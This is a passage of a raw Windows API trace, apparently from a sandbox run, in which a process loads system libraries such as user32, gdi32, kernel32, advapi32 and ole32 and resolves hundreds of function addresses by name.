[0039.313] GetProcAddress (hModule=0x76ca0000, lpProcName="GetDC") returned 0x76cb544c [0039.313] GetProcAddress (hModule=0x76ca0000, lpProcName="GetCursorPos") returned 0x76caa4b3 [0039.314] GetProcAddress (hModule=0x76ca0000, lpProcName="GetCursor") returned 0x76cd6408 [0039.314] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClipboardData") returned 0x76cc2ba7 [0039.314] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClientRect") returned 0x76cb54dd [0039.315] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClassNameW") returned 0x76cb2a29 [0039.315] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClassInfoExW") returned 0x76cb095e [0039.316] GetProcAddress (hModule=0x76ca0000, lpProcName="GetClassInfoW") returned 0x76cb0ac2 [0039.316] GetProcAddress (hModule=0x76ca0000, lpProcName="GetCapture") returned 0x76ca9dc7 [0039.317] GetProcAddress (hModule=0x76ca0000, lpProcName="GetActiveWindow") returned 0x76cd3b33 [0039.317] GetProcAddress (hModule=0x76ca0000, lpProcName="FrameRect") returned 0x76cd0eb0 [0039.318] GetProcAddress (hModule=0x76ca0000, lpProcName="FindWindowExW") returned 0x76cd712b [0039.318] GetProcAddress (hModule=0x76ca0000, lpProcName="FindWindowW") returned 0x76caae0d [0039.319] GetProcAddress (hModule=0x76ca0000, lpProcName="FillRect") returned 0x76cb5d56 [0039.319] GetProcAddress (hModule=0x76ca0000, lpProcName="EnumWindows") returned 0x76cb375b [0039.320] GetProcAddress (hModule=0x76ca0000, lpProcName="EnumThreadWindows") returned 0x76cab712 [0039.320] GetProcAddress (hModule=0x76ca0000, lpProcName="EnumChildWindows") returned 0x76cb2948 [0039.320] GetProcAddress (hModule=0x76ca0000, lpProcName="EndPaint") returned 0x76cb5d42 [0039.321] GetProcAddress (hModule=0x76ca0000, lpProcName="EndMenu") returned 0x76ca8302 [0039.321] GetProcAddress (hModule=0x76ca0000, lpProcName="EnableWindow") returned 0x76ca8d02 [0039.322] GetProcAddress (hModule=0x76ca0000, lpProcName="EnableScrollBar") returned 0x76cd19ce [0039.322] GetProcAddress (hModule=0x76ca0000, lpProcName="EnableMenuItem") returned 0x76cd43bc [0039.322] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawTextExW") returned 0x76cb5894 [0039.323] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawTextW") returned 0x76cb5b6a [0039.323] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawMenuBar") returned 0x76cd15ae [0039.324] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawIconEx") returned 0x76cb2c32 [0039.324] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawIcon") returned 0x76ca6427 [0039.325] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawFrameControl") returned 0x76ccb4f9 [0039.325] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawFocusRect") returned 0x76cd3091 [0039.325] GetProcAddress (hModule=0x76ca0000, lpProcName="DrawEdge") returned 0x76cb311a [0039.326] GetProcAddress (hModule=0x76ca0000, lpProcName="DispatchMessageA") returned 0x76cb2e32 [0039.326] GetProcAddress (hModule=0x76ca0000, lpProcName="DispatchMessageW") returned 0x76cbcc61 [0039.327] GetProcAddress (hModule=0x76ca0000, lpProcName="DestroyWindow") returned 0x76cab2f4 [0039.327] GetProcAddress (hModule=0x76ca0000, lpProcName="DestroyMenu") returned 0x76ca87f7 [0039.327] GetProcAddress (hModule=0x76ca0000, lpProcName="DestroyIcon") returned 0x76caa77f [0039.328] GetProcAddress (hModule=0x76ca0000, lpProcName="DestroyCursor") returned 0x76caa77f [0039.328] GetProcAddress (hModule=0x76ca0000, lpProcName="DeleteMenu") returned 0x76ca83c2 [0039.329] GetProcAddress (hModule=0x76ca0000, lpProcName="DefWindowProcW") returned 0x76cb507d [0039.329] GetProcAddress (hModule=0x76ca0000, lpProcName="DefMDIChildProcW") returned 0x76cd150a [0039.330] GetProcAddress (hModule=0x76ca0000, lpProcName="DefFrameProcW") returned 0x76cd152b [0039.330] GetProcAddress (hModule=0x76ca0000, lpProcName="CreatePopupMenu") returned 0x76ca867c [0039.330] GetProcAddress (hModule=0x76ca0000, lpProcName="CreateMenu") returned 0x76cd6aed [0039.331] GetProcAddress (hModule=0x76ca0000, lpProcName="CreateIcon") returned 0x76cc7510 [0039.331] GetProcAddress (hModule=0x76ca0000, lpProcName="CreateDesktopW") returned 0x76ca40cf [0039.332] GetProcAddress (hModule=0x76ca0000, lpProcName="CopyImage") returned 0x76ca87a6 [0039.332] GetProcAddress (hModule=0x76ca0000, lpProcName="CloseDesktop") returned 0x76cac4ce [0039.332] GetProcAddress (hModule=0x76ca0000, lpProcName="ClientToScreen") returned 0x76cb1316 [0039.333] GetProcAddress (hModule=0x76ca0000, lpProcName="CheckMenuItem") returned 0x76ccee7c [0039.333] GetProcAddress (hModule=0x76ca0000, lpProcName="CharUpperBuffW") returned 0x76cbebd5 [0039.334] GetProcAddress (hModule=0x76ca0000, lpProcName="CharUpperW") returned 0x76cbe981 [0039.334] GetProcAddress (hModule=0x76ca0000, lpProcName="CharNextW") returned 0x76cb0be6 [0039.334] GetProcAddress (hModule=0x76ca0000, lpProcName="CharLowerBuffW") returned 0x76cb3afe [0039.335] GetProcAddress (hModule=0x76ca0000, lpProcName="CharLowerW") returned 0x76caba8a [0039.335] GetProcAddress (hModule=0x76ca0000, lpProcName="CallWindowProcW") returned 0x76cb1b3c [0039.336] GetProcAddress (hModule=0x76ca0000, lpProcName="CallNextHookEx") returned 0x76caabe1 [0039.336] GetProcAddress (hModule=0x76ca0000, lpProcName="BeginPaint") returned 0x76cb5d14 [0039.337] GetProcAddress (hModule=0x76ca0000, lpProcName="AdjustWindowRectEx") returned 0x76cb48ba [0039.337] GetProcAddress (hModule=0x76ca0000, lpProcName="ActivateKeyboardLayout") returned 0x76ca8203 [0039.337] IsBadReadPtr (lp=0x6df4078, ucb=0x14) returned 0 [0039.337] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x76dd0000 [0039.338] GetProcAddress (hModule=0x76dd0000, lpProcName="UnrealizeObject") returned 0x76ddfb63 [0039.338] GetProcAddress (hModule=0x76dd0000, lpProcName="StretchBlt") returned 0x76ddf467 [0039.339] GetProcAddress (hModule=0x76dd0000, lpProcName="SetWindowOrgEx") returned 0x76dd8546 [0039.339] GetProcAddress (hModule=0x76dd0000, lpProcName="SetWinMetaFileBits") returned 0x76e0d957 [0039.339] GetProcAddress (hModule=0x76dd0000, lpProcName="SetViewportOrgEx") returned 0x76dd834f [0039.340] GetProcAddress (hModule=0x76dd0000, lpProcName="SetTextColor") returned 0x76dd6906 [0039.340] GetProcAddress (hModule=0x76dd0000, lpProcName="SetStretchBltMode") returned 0x76dd7705 [0039.341] GetProcAddress (hModule=0x76dd0000, lpProcName="SetROP2") returned 0x76ddf9e0 [0039.341] GetProcAddress (hModule=0x76dd0000, lpProcName="SetPixel") returned 0x76df14f3 [0039.342] GetProcAddress (hModule=0x76dd0000, lpProcName="SetMapMode") returned 0x76ddefbf [0039.342] GetProcAddress (hModule=0x76dd0000, lpProcName="SetEnhMetaFileBits") returned 0x76deb380 [0039.342] GetProcAddress (hModule=0x76dd0000, lpProcName="SetDIBits") returned 0x76dda995 [0039.343] GetProcAddress (hModule=0x76dd0000, lpProcName="SetDIBColorTable") returned 0x76df1492 [0039.343] GetProcAddress (hModule=0x76dd0000, lpProcName="SetBrushOrgEx") returned 0x76ddc4c5 [0039.344] GetProcAddress (hModule=0x76dd0000, lpProcName="SetBkMode") returned 0x76dd69b1 [0039.344] GetProcAddress (hModule=0x76dd0000, lpProcName="SetBkColor") returned 0x76dd6a3c [0039.344] GetProcAddress (hModule=0x76dd0000, lpProcName="SelectPalette") returned 0x76dda1f6 [0039.345] GetProcAddress (hModule=0x76dd0000, lpProcName="SelectObject") returned 0x76dd6640 [0039.345] GetProcAddress (hModule=0x76dd0000, lpProcName="SaveDC") returned 0x76dda74b [0039.346] GetProcAddress (hModule=0x76dd0000, lpProcName="RoundRect") returned 0x76df016d [0039.346] GetProcAddress (hModule=0x76dd0000, lpProcName="RestoreDC") returned 0x76dda67b [0039.346] GetProcAddress (hModule=0x76dd0000, lpProcName="Rectangle") returned 0x76ddf1ff [0039.347] GetProcAddress (hModule=0x76dd0000, lpProcName="RectVisible") returned 0x76dd8f13 [0039.347] GetProcAddress (hModule=0x76dd0000, lpProcName="RealizePalette") returned 0x76ddef91 [0039.348] GetProcAddress (hModule=0x76dd0000, lpProcName="Polyline") returned 0x76de05cf [0039.348] GetProcAddress (hModule=0x76dd0000, lpProcName="Polygon") returned 0x76ddfb87 [0039.348] GetProcAddress (hModule=0x76dd0000, lpProcName="PolyBezierTo") returned 0x76e06c25 [0039.349] GetProcAddress (hModule=0x76dd0000, lpProcName="PolyBezier") returned 0x76e06b03 [0039.349] GetProcAddress (hModule=0x76dd0000, lpProcName="PlayEnhMetaFile") returned 0x76de990d [0039.350] GetProcAddress (hModule=0x76dd0000, lpProcName="Pie") returned 0x76e0569f [0039.350] GetProcAddress (hModule=0x76dd0000, lpProcName="PatBlt") returned 0x76dd62af [0039.351] GetProcAddress (hModule=0x76dd0000, lpProcName="MoveToEx") returned 0x76dd8c21 [0039.351] GetProcAddress (hModule=0x76dd0000, lpProcName="MaskBlt") returned 0x76ddc7ad [0039.352] GetProcAddress (hModule=0x76dd0000, lpProcName="LineTo") returned 0x76ddf59b [0039.352] GetProcAddress (hModule=0x76dd0000, lpProcName="LPtoDP") returned 0x76dd8484 [0039.353] GetProcAddress (hModule=0x76dd0000, lpProcName="IntersectClipRect") returned 0x76dd7dfe [0039.353] GetProcAddress (hModule=0x76dd0000, lpProcName="GetWindowOrgEx") returned 0x76ddd1bf [0039.354] GetProcAddress (hModule=0x76dd0000, lpProcName="GetWinMetaFileBits") returned 0x76e0d7cb [0039.354] GetProcAddress (hModule=0x76dd0000, lpProcName="GetTextMetricsW") returned 0x76dd7b8f [0039.354] GetProcAddress (hModule=0x76dd0000, lpProcName="GetTextExtentPointW") returned 0x76ddb358 [0039.355] GetProcAddress (hModule=0x76dd0000, lpProcName="GetTextExtentPoint32W") returned 0x76ddb4b5 [0039.355] GetProcAddress (hModule=0x76dd0000, lpProcName="GetSystemPaletteEntries") returned 0x76ddc2e1 [0039.356] GetProcAddress (hModule=0x76dd0000, lpProcName="GetStockObject") returned 0x76dd5ddf [0039.356] GetProcAddress (hModule=0x76dd0000, lpProcName="GetRgnBox") returned 0x76dd621f [0039.357] GetProcAddress (hModule=0x76dd0000, lpProcName="GetPixel") returned 0x76ddc3d5 [0039.357] GetProcAddress (hModule=0x76dd0000, lpProcName="GetPaletteEntries") returned 0x76ddc2aa [0039.358] GetProcAddress (hModule=0x76dd0000, lpProcName="GetObjectW") returned 0x76dd7568 [0039.358] GetProcAddress (hModule=0x76dd0000, lpProcName="GetEnhMetaFilePaletteEntries") returned 0x76e0d1ac [0039.359] GetProcAddress (hModule=0x76dd0000, lpProcName="GetEnhMetaFileHeader") returned 0x76decd3a [0039.359] GetProcAddress (hModule=0x76dd0000, lpProcName="GetEnhMetaFileDescriptionW") returned 0x76e0dc6b [0039.360] GetProcAddress (hModule=0x76dd0000, lpProcName="GetEnhMetaFileBits") returned 0x76decdc8 [0039.360] GetProcAddress (hModule=0x76dd0000, lpProcName="GetDeviceCaps") returned 0x76dd6f7f [0039.361] GetProcAddress (hModule=0x76dd0000, lpProcName="GetDIBits") returned 0x76dda23b [0039.361] GetProcAddress (hModule=0x76dd0000, lpProcName="GetDIBColorTable") returned 0x76dda149 [0039.361] GetProcAddress (hModule=0x76dd0000, lpProcName="GetCurrentPositionEx") returned 0x76dd8d78 [0039.362] GetProcAddress (hModule=0x76dd0000, lpProcName="GetClipBox") returned 0x76dd8525 [0039.362] GetProcAddress (hModule=0x76dd0000, lpProcName="GetBrushOrgEx") returned 0x76ddc943 [0039.363] GetProcAddress (hModule=0x76dd0000, lpProcName="GetBitmapBits") returned 0x76ddc1ba [0039.363] GetProcAddress (hModule=0x76dd0000, lpProcName="GdiFlush") returned 0x76dd5fe4 [0039.364] GetProcAddress (hModule=0x76dd0000, lpProcName="FrameRgn") returned 0x76e05ae2 [0039.364] GetProcAddress (hModule=0x76dd0000, lpProcName="ExtTextOutW") returned 0x76dd8192 [0039.365] GetProcAddress (hModule=0x76dd0000, lpProcName="ExtFloodFill") returned 0x76defd94 [0039.365] GetProcAddress (hModule=0x76dd0000, lpProcName="ExcludeClipRect") returned 0x76dd9218 [0039.366] GetProcAddress (hModule=0x76dd0000, lpProcName="EnumFontFamiliesExW") returned 0x76ddce94 [0039.366] GetProcAddress (hModule=0x76dd0000, lpProcName="Ellipse") returned 0x76e055e3 [0039.366] GetProcAddress (hModule=0x76dd0000, lpProcName="DeleteObject") returned 0x76dd5f14 [0039.367] GetProcAddress (hModule=0x76dd0000, lpProcName="DeleteEnhMetaFile") returned 0x76debda2 [0039.368] GetProcAddress (hModule=0x76dd0000, lpProcName="DeleteDC") returned 0x76dd6eaa [0039.368] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateSolidBrush") returned 0x76dd6b49 [0039.369] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateRectRgn") returned 0x76dd633b [0039.369] GetProcAddress (hModule=0x76dd0000, lpProcName="CreatePenIndirect") returned 0x76de744d [0039.370] GetProcAddress (hModule=0x76dd0000, lpProcName="CreatePalette") returned 0x76ddb1b0 [0039.370] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateHalftonePalette") returned 0x76ddc2cd [0039.371] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateFontIndirectW") returned 0x76ddabfc [0039.371] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateEnhMetaFileW") returned 0x76decc1f [0039.372] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateDIBitmap") returned 0x76dda379 [0039.372] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateDIBSection") returned 0x76dd8850 [0039.372] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateCompatibleDC") returned 0x76dd6888 [0039.373] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateCompatibleBitmap") returned 0x76dd73ad [0039.373] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateBrushIndirect") returned 0x76dd993c [0039.374] GetProcAddress (hModule=0x76dd0000, lpProcName="CreateBitmap") returned 0x76dd6b79 [0039.374] GetProcAddress (hModule=0x76dd0000, lpProcName="CopyEnhMetaFileW") returned 0x76e0d651 [0039.375] GetProcAddress (hModule=0x76dd0000, lpProcName="CombineRgn") returned 0x76dd651e [0039.375] GetProcAddress (hModule=0x76dd0000, lpProcName="CloseEnhMetaFile") returned 0x76dec3fe [0039.376] GetProcAddress (hModule=0x76dd0000, lpProcName="Chord") returned 0x76e054fa [0039.376] GetProcAddress (hModule=0x76dd0000, lpProcName="BitBlt") returned 0x76dd72c0 [0039.377] GetProcAddress (hModule=0x76dd0000, lpProcName="ArcTo") returned 0x76e05436 [0039.377] GetProcAddress (hModule=0x76dd0000, lpProcName="Arc") returned 0x76e0534e [0039.377] GetProcAddress (hModule=0x76dd0000, lpProcName="AngleArc") returned 0x76e05299 [0039.377] IsBadReadPtr (lp=0x6df408c, ucb=0x14) returned 0 [0039.377] LoadLibraryA (lpLibFileName="version.dll") returned 0x748a0000 [0039.378] GetProcAddress (hModule=0x748a0000, lpProcName="VerQueryValueW") returned 0x748a1b51 [0039.379] GetProcAddress (hModule=0x748a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x748a19d9 [0039.379] GetProcAddress (hModule=0x748a0000, lpProcName="GetFileVersionInfoW") returned 0x748a19f4 [0039.379] IsBadReadPtr (lp=0x6df40a0, ucb=0x14) returned 0 [0039.379] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.380] GetProcAddress (hModule=0x75900000, lpProcName="WriteFile") returned 0x75951400 [0039.380] GetProcAddress (hModule=0x75900000, lpProcName="WinExec") returned 0x7598e5fd [0039.381] GetProcAddress (hModule=0x75900000, lpProcName="WideCharToMultiByte") returned 0x7595450e [0039.381] GetProcAddress (hModule=0x75900000, lpProcName="WaitForSingleObject") returned 0x7594ba90 [0039.382] GetProcAddress (hModule=0x75900000, lpProcName="WaitForMultipleObjectsEx") returned 0x7594bc00 [0039.382] GetProcAddress (hModule=0x75900000, lpProcName="VirtualQueryEx") returned 0x75934e42 [0039.382] GetProcAddress (hModule=0x75900000, lpProcName="VirtualQuery") returned 0x759576d6 [0039.383] GetProcAddress (hModule=0x75900000, lpProcName="VirtualProtect") returned 0x75942341 [0039.384] GetProcAddress (hModule=0x75900000, lpProcName="VirtualFree") returned 0x75951da4 [0039.384] GetProcAddress (hModule=0x75900000, lpProcName="VirtualAlloc") returned 0x75952fb6 [0039.385] GetProcAddress (hModule=0x75900000, lpProcName="SwitchToThread") returned 0x7593eb24 [0039.385] GetProcAddress (hModule=0x75900000, lpProcName="SuspendThread") returned 0x75960ca9 [0039.386] GetProcAddress (hModule=0x75900000, lpProcName="Sleep") returned 0x7594ba46 [0039.386] GetProcAddress (hModule=0x75900000, lpProcName="SizeofResource") returned 0x75943e7f [0039.387] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadPriority") returned 0x75944815 [0039.387] GetProcAddress (hModule=0x75900000, lpProcName="SetThreadLocale") returned 0x759688e6 [0039.387] GetProcAddress (hModule=0x75900000, lpProcName="SetLastError") returned 0x7594bb08 [0039.388] GetProcAddress (hModule=0x75900000, lpProcName="SetFilePointer") returned 0x7594db36 [0039.388] GetProcAddress (hModule=0x75900000, lpProcName="SetEvent") returned 0x7594bccc [0039.389] GetProcAddress (hModule=0x75900000, lpProcName="SetErrorMode") returned 0x75954a51 [0039.389] GetProcAddress (hModule=0x75900000, lpProcName="SetEndOfFile") returned 0x75942319 [0039.390] GetProcAddress (hModule=0x75900000, lpProcName="ResumeThread") returned 0x75940f1c [0039.390] GetProcAddress (hModule=0x75900000, lpProcName="ResetEvent") returned 0x7594bcb4 [0039.391] GetProcAddress (hModule=0x75900000, lpProcName="RemoveDirectoryW") returned 0x7593586a [0039.391] GetProcAddress (hModule=0x75900000, lpProcName="ReadFile") returned 0x759496fb [0039.392] GetProcAddress (hModule=0x75900000, lpProcName="RaiseException") returned 0x7593eb60 [0039.392] GetProcAddress (hModule=0x75900000, lpProcName="IsDebuggerPresent") returned 0x75943ea8 [0039.393] GetProcAddress (hModule=0x75900000, lpProcName="OpenProcess") returned 0x759459d7 [0039.393] GetProcAddress (hModule=0x75900000, lpProcName="MulDiv") returned 0x7594b7a0 [0039.393] GetProcAddress (hModule=0x75900000, lpProcName="LockResource") returned 0x7593fd29 [0039.394] GetProcAddress (hModule=0x75900000, lpProcName="LocalFree") returned 0x7594ca64 [0039.394] GetProcAddress (hModule=0x75900000, lpProcName="LoadResource") returned 0x7594984d [0039.395] GetProcAddress (hModule=0x75900000, lpProcName="LoadLibraryW") returned 0x75953c01 [0039.395] GetProcAddress (hModule=0x75900000, lpProcName="LeaveCriticalSection") returned 0x77247760 [0039.396] GetProcAddress (hModule=0x75900000, lpProcName="IsValidLocale") returned 0x75943de4 [0039.396] GetProcAddress (hModule=0x75900000, lpProcName="InitializeCriticalSection") returned 0x7725a149 [0039.397] GetProcAddress (hModule=0x75900000, lpProcName="HeapFree") returned 0x7594bbd0 [0039.397] GetProcAddress (hModule=0x75900000, lpProcName="HeapDestroy") returned 0x75942301 [0039.398] GetProcAddress (hModule=0x75900000, lpProcName="HeapCreate") returned 0x75953ea2 [0039.398] GetProcAddress (hModule=0x75900000, lpProcName="HeapAlloc") returned 0x77252dd6 [0039.399] GetProcAddress (hModule=0x75900000, lpProcName="GlobalUnlock") returned 0x75949d50 [0039.399] GetProcAddress (hModule=0x75900000, lpProcName="GlobalSize") returned 0x7593eb78 [0039.399] GetProcAddress (hModule=0x75900000, lpProcName="GlobalLock") returned 0x75949e05 [0039.400] GetProcAddress (hModule=0x75900000, lpProcName="GlobalFree") returned 0x75949cf9 [0039.401] GetProcAddress (hModule=0x75900000, lpProcName="GlobalFindAtomW") returned 0x7594912d [0039.401] GetProcAddress (hModule=0x75900000, lpProcName="GlobalDeleteAtom") returned 0x7593f16c [0039.401] GetProcAddress (hModule=0x75900000, lpProcName="GlobalAlloc") returned 0x75949ce1 [0039.402] GetProcAddress (hModule=0x75900000, lpProcName="GlobalAddAtomW") returned 0x759470f9 [0039.402] GetProcAddress (hModule=0x75900000, lpProcName="GetVolumeInformationW") returned 0x75957598 [0039.403] GetProcAddress (hModule=0x75900000, lpProcName="GetVersionExW") returned 0x75943b1a [0039.403] GetProcAddress (hModule=0x75900000, lpProcName="GetVersion") returned 0x7594154e [0039.404] GetProcAddress (hModule=0x75900000, lpProcName="GetUserDefaultLCID") returned 0x75956584 [0039.404] GetProcAddress (hModule=0x75900000, lpProcName="GetTimeZoneInformation") returned 0x75938a3b [0039.405] GetProcAddress (hModule=0x75900000, lpProcName="GetTickCount") returned 0x7594ba60 [0039.405] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadPriority") returned 0x75949147 [0039.406] GetProcAddress (hModule=0x75900000, lpProcName="GetThreadLocale") returned 0x7594153c [0039.406] GetProcAddress (hModule=0x75900000, lpProcName="GetTempPathW") returned 0x75938b33 [0039.406] GetProcAddress (hModule=0x75900000, lpProcName="GetStdHandle") returned 0x75951e46 [0039.407] GetProcAddress (hModule=0x75900000, lpProcName="GetProcAddress") returned 0x759533d3 [0039.408] GetProcAddress (hModule=0x75900000, lpProcName="GetModuleHandleW") returned 0x7595374d [0039.408] GetProcAddress (hModule=0x75900000, lpProcName="GetModuleFileNameW") returned 0x75953c26 [0039.408] GetProcAddress (hModule=0x75900000, lpProcName="GetLocaleInfoW") returned 0x75956596 [0039.409] GetProcAddress (hModule=0x75900000, lpProcName="GetLocalTime") returned 0x7594a90e [0039.409] GetProcAddress (hModule=0x75900000, lpProcName="GetLastError") returned 0x7594bf00 [0039.410] GetProcAddress (hModule=0x75900000, lpProcName="GetFullPathNameW") returned 0x75954543 [0039.410] GetProcAddress (hModule=0x75900000, lpProcName="GetFileSize") returned 0x75940273 [0039.411] GetProcAddress (hModule=0x75900000, lpProcName="GetFileAttributesW") returned 0x759564ff [0039.411] GetProcAddress (hModule=0x75900000, lpProcName="GetExitCodeThread") returned 0x75936ddd [0039.411] GetProcAddress (hModule=0x75900000, lpProcName="GetEnvironmentVariableW") returned 0x759565c4 [0039.412] GetProcAddress (hModule=0x75900000, lpProcName="GetDiskFreeSpaceW") returned 0x75933530 [0039.412] GetProcAddress (hModule=0x75900000, lpProcName="GetDateFormatW") returned 0x7594afab [0039.413] GetProcAddress (hModule=0x75900000, lpProcName="GetCurrentThreadId") returned 0x7594bb80 [0039.413] GetProcAddress (hModule=0x75900000, lpProcName="GetCurrentThread") returned 0x75953351 [0039.414] GetProcAddress (hModule=0x75900000, lpProcName="GetCurrentProcessId") returned 0x7594cac4 [0039.414] GetProcAddress (hModule=0x75900000, lpProcName="GetCurrentProcess") returned 0x7594cdcf [0039.414] GetProcAddress (hModule=0x75900000, lpProcName="GetComputerNameW") returned 0x759403ff [0039.415] GetProcAddress (hModule=0x75900000, lpProcName="GetCPInfoExW") returned 0x75938b1b [0039.415] GetProcAddress (hModule=0x75900000, lpProcName="GetCPInfo") returned 0x75951e2e [0039.416] GetProcAddress (hModule=0x75900000, lpProcName="GetACP") returned 0x759539aa [0039.416] GetProcAddress (hModule=0x75900000, lpProcName="FreeResource") returned 0x7593f1bd [0039.417] GetProcAddress (hModule=0x75900000, lpProcName="InterlockedExchange") returned 0x7594bf0a [0039.417] GetProcAddress (hModule=0x75900000, lpProcName="InterlockedCompareExchange") returned 0x7594bb92 [0039.417] GetProcAddress (hModule=0x75900000, lpProcName="FreeLibrary") returned 0x7594d9d0 [0039.418] GetProcAddress (hModule=0x75900000, lpProcName="FormatMessageW") returned 0x759454a3 [0039.419] GetProcAddress (hModule=0x75900000, lpProcName="FindResourceW") returned 0x75943e61 [0039.419] GetProcAddress (hModule=0x75900000, lpProcName="FindNextFileW") returned 0x7594963a [0039.419] GetProcAddress (hModule=0x75900000, lpProcName="FindFirstFileW") returned 0x759553b2 [0039.420] GetProcAddress (hModule=0x75900000, lpProcName="FindClose") returned 0x75950e62 [0039.420] GetProcAddress (hModule=0x75900000, lpProcName="FileTimeToLocalFileTime") returned 0x75952004 [0039.421] GetProcAddress (hModule=0x75900000, lpProcName="FileTimeToDosDateTime") returned 0x75942ce1 [0039.421] GetProcAddress (hModule=0x75900000, lpProcName="EnumSystemLocalesW") returned 0x7598f3df [0039.422] GetProcAddress (hModule=0x75900000, lpProcName="EnumCalendarInfoW") returned 0x7598f38f [0039.422] GetProcAddress (hModule=0x75900000, lpProcName="EnterCriticalSection") returned 0x772477a0 [0039.423] GetProcAddress (hModule=0x75900000, lpProcName="DeleteFileW") returned 0x75940f62 [0039.423] GetProcAddress (hModule=0x75900000, lpProcName="DeleteCriticalSection") returned 0x77259ac5 [0039.426] GetProcAddress (hModule=0x75900000, lpProcName="CreateThread") returned 0x7595375d [0039.426] GetProcAddress (hModule=0x75900000, lpProcName="CreateProcessW") returned 0x7590204d [0039.427] GetProcAddress (hModule=0x75900000, lpProcName="CreateFileW") returned 0x7594cc56 [0039.427] GetProcAddress (hModule=0x75900000, lpProcName="CreateEventW") returned 0x75953386 [0039.428] GetProcAddress (hModule=0x75900000, lpProcName="CreateDirectoryW") returned 0x75943925 [0039.428] GetProcAddress (hModule=0x75900000, lpProcName="CompareStringW") returned 0x75949bee [0039.429] GetProcAddress (hModule=0x75900000, lpProcName="CloseHandle") returned 0x7594ca7c [0039.429] IsBadReadPtr (lp=0x6df40b4, ucb=0x14) returned 0 [0039.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76650000 [0039.429] GetProcAddress (hModule=0x76650000, lpProcName="RegSetValueExW") returned 0x766614d6 [0039.430] GetProcAddress (hModule=0x76650000, lpProcName="RegQueryValueExW") returned 0x766646ad [0039.432] GetProcAddress (hModule=0x76650000, lpProcName="RegQueryInfoKeyW") returned 0x766646e7 [0039.432] GetProcAddress (hModule=0x76650000, lpProcName="RegOpenKeyExW") returned 0x7666468d [0039.433] GetProcAddress (hModule=0x76650000, lpProcName="RegFlushKey") returned 0x7667773f [0039.433] GetProcAddress (hModule=0x76650000, lpProcName="RegEnumKeyExW") returned 0x766646c8 [0039.434] GetProcAddress (hModule=0x76650000, lpProcName="RegCreateKeyExW") returned 0x766640fe [0039.434] GetProcAddress (hModule=0x76650000, lpProcName="RegCloseKey") returned 0x7666469d [0039.434] GetProcAddress (hModule=0x76650000, lpProcName="GetUserNameW") returned 0x7666157a [0039.435] IsBadReadPtr (lp=0x6df40c8, ucb=0x14) returned 0 [0039.435] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75900000 [0039.436] GetProcAddress (hModule=0x75900000, lpProcName="Sleep") returned 0x7594ba46 [0039.436] IsBadReadPtr (lp=0x6df40dc, ucb=0x14) returned 0 [0039.436] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76ee0000 [0039.437] GetProcAddress (hModule=0x76ee0000, lpProcName="SafeArrayPtrOfIndex") returned 0x76efe1ce [0039.437] GetProcAddress (hModule=0x76ee0000, lpProcName="SafeArrayGetUBound") returned 0x76efe127 [0039.437] GetProcAddress (hModule=0x76ee0000, lpProcName="SafeArrayGetLBound") returned 0x76efe173 [0039.438] GetProcAddress (hModule=0x76ee0000, lpProcName="SafeArrayCreate") returned 0x76efe263 [0039.438] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantChangeType") returned 0x76ee5dee [0039.439] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantCopyInd") returned 0x76efe86c [0039.439] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantCopy") returned 0x76ee48f1 [0039.440] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantClear") returned 0x76ee3eae [0039.440] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantInit") returned 0x76ee3ed5 [0039.440] IsBadReadPtr (lp=0x6df40f0, ucb=0x14) returned 0 [0039.440] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76ee0000 [0039.441] GetProcAddress (hModule=0x76ee0000, lpProcName="GetErrorInfo") returned 0x76ee3f21 [0039.442] GetProcAddress (hModule=0x76ee0000, lpProcName="GetActiveObject") returned 0x76f28f58 [0039.442] GetProcAddress (hModule=0x76ee0000, lpProcName="SysFreeString") returned 0x76ee3e59 [0039.442] IsBadReadPtr (lp=0x6df4104, ucb=0x14) returned 0 [0039.442] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76a90000 [0039.443] GetProcAddress (hModule=0x76a90000, lpProcName="CreateStreamOnHGlobal") returned 0x76ab363b [0039.444] GetProcAddress (hModule=0x76a90000, lpProcName="IsAccelerator") returned 0x76b5043e [0039.444] GetProcAddress (hModule=0x76a90000, lpProcName="OleDraw") returned 0x76b10286 [0039.444] GetProcAddress (hModule=0x76a90000, lpProcName="OleSetMenuDescriptor") returned 0x76aedc53 [0039.445] GetProcAddress (hModule=0x76a90000, lpProcName="OleUninitialize") returned 0x76aaeba1 [0039.445] GetProcAddress (hModule=0x76a90000, lpProcName="OleInitialize") returned 0x76aaefd7 [0039.446] GetProcAddress (hModule=0x76a90000, lpProcName="CoTaskMemFree") returned 0x76ae6f41 [0039.446] GetProcAddress (hModule=0x76a90000, lpProcName="CoTaskMemAlloc") returned 0x76adea4c [0039.447] GetProcAddress (hModule=0x76a90000, lpProcName="ProgIDFromCLSID") returned 0x76b1ef82 [0039.447] GetProcAddress (hModule=0x76a90000, 